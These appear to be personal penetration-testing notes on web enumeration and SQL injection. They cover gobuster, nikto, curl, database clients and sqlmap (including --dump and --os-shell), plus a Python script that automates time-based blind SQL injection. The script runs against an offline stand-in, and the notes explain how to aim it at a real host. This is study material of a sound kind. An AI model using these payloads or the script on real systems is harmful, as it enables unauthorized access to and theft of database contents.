Web
Enum
Directories and pages
gobuster dir -u $ip -w /usr/share/wordlists/dirb/common.txt -t 5 where -u is the target URL (gobuster prepends http:// if you give it a bare IP), -w is the wordlist, and -t is the number of threads. Keep -t low against fragile hosts; the default of 10 can knock over a weak web app.
APIs
gobuster dir -u $ip -w /usr/share/wordlists/dirb/big.txt -p $pattern where -p is a file of gobuster patterns, one per line, with {GOBUSTER} standing in for each wordlist entry (every word is tried as-is and once per pattern). There's no built-in pattern list, so you'll have to make one up as you go, informed by the API calls you see. A minimal pattern file for versioned endpoints looks like:
{GOBUSTER}/v1
{GOBUSTER}/v2
nikto -h URL is a simple vuln scanner/enum scanner; it's a good place to start against relatively unprotected hosts.
Burp Suite
TODO
cURL
curl -i $url -d $data -H $header --proxy $proxy sends a request to $url: -i includes the response headers in the output, -d sends $data as the request body (and switches the method to POST), -H adds a request header and can be given more than once, and --proxy routes the request through $proxy (for example 127.0.0.1:8080 to see it in Burp).
-X "$method" can be used to specify other HTTP methods (GET is the default; -d already implies POST, so -X is mainly for PUT, DELETE, etc.)
Well Known URLs
Directory Traversal
SQLi
Connection and Recon
Connect to mysql: mysql -u root -p'root' -h $ip -P $p where -u is the user, -p the password (no space between -p and the value, otherwise mysql prompts for it), -h the host, and -P the port.
Some useful commands
Connect to mssql from kali with impacket: impacket-mssqlclient Administrator:passw0rd@$ip -windows-auth is pretty straightforward; -windows-auth uses Windows (NTLM) authentication for the domain/local account instead of a SQL Server login.
Injection
Get the number of columns with ' ORDER BY 1-- //, incrementing the number until the query errors; the last value that still works is the column count (the trailing // just guarantees the space MySQL needs after --).
Timing-based attack: the injected IF only sleeps when its condition is true, so a slow response means true. AND IF (1=1, sleep(3),'false') -- // (MySQL syntax; replace 1=1 with the condition you want to test). Watch out: SQL does not guarantee short-circuit evaluation of AND/OR, so don't rely on a false left-hand side suppressing the sleep; keep the condition you care about inside the IF.
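An added example, not from these notes, that automates the two manual steps above: counting columns with ORDER BY n and then leaking a value with a time-based IF(..., SLEEP(), 0) payload, binary-searching each character's ASCII code so it takes about 7 requests per character instead of up to 127. The target is a constructed in-memory stand-in (fake_page, SECRET_VALUE, COLUMN_COUNT, the users/username table name) that parses the payload and returns the status and delay a MySQL-backed page would produce, so it runs offline; in a real engagement the send function would be an HTTP request through Burp and the delay would be measured with a timer.

```python
import re

# ---- constructed stand-in for the vulnerable page (not a real target) ----
SECRET_VALUE = "admin"   # pretend this is the first username in the users table
COLUMN_COUNT = 3         # number of columns in the injectable SELECT

def fake_page(fragment):
    """Mimic a MySQL-backed page: return (http_status, seconds_taken)."""
    m = re.search(r"ORDER BY (\d+)--", fragment)
    if m:
        # MySQL raises "Unknown column 'N' in 'order clause'" once N exceeds
        # the column count; many apps surface that as a 500.
        return (500, 0.0) if int(m.group(1)) > COLUMN_COUNT else (200, 0.0)
    m = re.search(
        r"AND IF\(ASCII\(SUBSTRING\(\(SELECT username FROM users LIMIT 1\),"
        r"(\d+),1\)\)>(\d+),SLEEP\(([\d.]+)\),0\)--",
        fragment,
    )
    if m:
        pos, bound, delay = int(m.group(1)), int(m.group(2)), float(m.group(3))
        # SUBSTRING past the end of the string is '' and ASCII('') is 0 in MySQL
        code = ord(SECRET_VALUE[pos - 1]) if pos <= len(SECRET_VALUE) else 0
        return (200, delay if code > bound else 0.0)
    return (200, 0.0)

# ---- the attacker side: works against any send(fragment) -> (status, seconds) ----
def count_columns(send, max_cols=32):
    """Step 1: increase ORDER BY n until the page breaks; the previous n is the count."""
    for n in range(1, max_cols + 1):
        status, _ = send(f"' ORDER BY {n}-- //")
        if status != 200:
            return n - 1
    raise RuntimeError(f"no error up to ORDER BY {max_cols}; wrong injection point?")

def leak_char(send, pos, sleep_s=3.0):
    """Step 2: binary-search one character's ASCII code using response time as the oracle."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        # condition lives inside the IF, so it is evaluated regardless of AND short-circuiting
        payload = (
            f"' AND IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),{pos},1))>{mid},"
            f"SLEEP({sleep_s}),0)-- //"
        )
        _, elapsed = send(payload)
        # half the sleep as threshold so ordinary network jitter doesn't flip a bit
        if elapsed >= sleep_s / 2:
            lo = mid + 1      # code > mid
        else:
            hi = mid          # code <= mid
    return lo

def leak_string(send, max_len=64):
    """Leak characters until SUBSTRING runs past the end (ASCII code 0)."""
    out = ""
    for pos in range(1, max_len + 1):
        code = leak_char(send, pos)
        if code == 0:
            break
        out += chr(code)
    return out

if __name__ == "__main__":
    print("columns:", count_columns(fake_page))   # 3
    print("leaked :", leak_string(fake_page))     # admin
```

To point this at a real host, replace fake_page with a function that issues the request (through --proxy / Burp if you want to watch it) and returns the HTTP status and measured elapsed time; the attacker-side functions don't change.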
sqlmap
Use sqlmap -u "$url/blindsqli.php?user=1" -p user where -p is the vulnerable parameter (quote the URL so the shell doesn't mangle ? and &). --dump dumps table entries (scope it with -D and -T, or use --dump-all for every database), and --os-shell tries to get an OS shell through the DBMS.
Note that sqlmap is super loud: it sends hundreds to thousands of requests with recognisable payloads and a default User-Agent, so expect it to show up in logs and trip any WAF.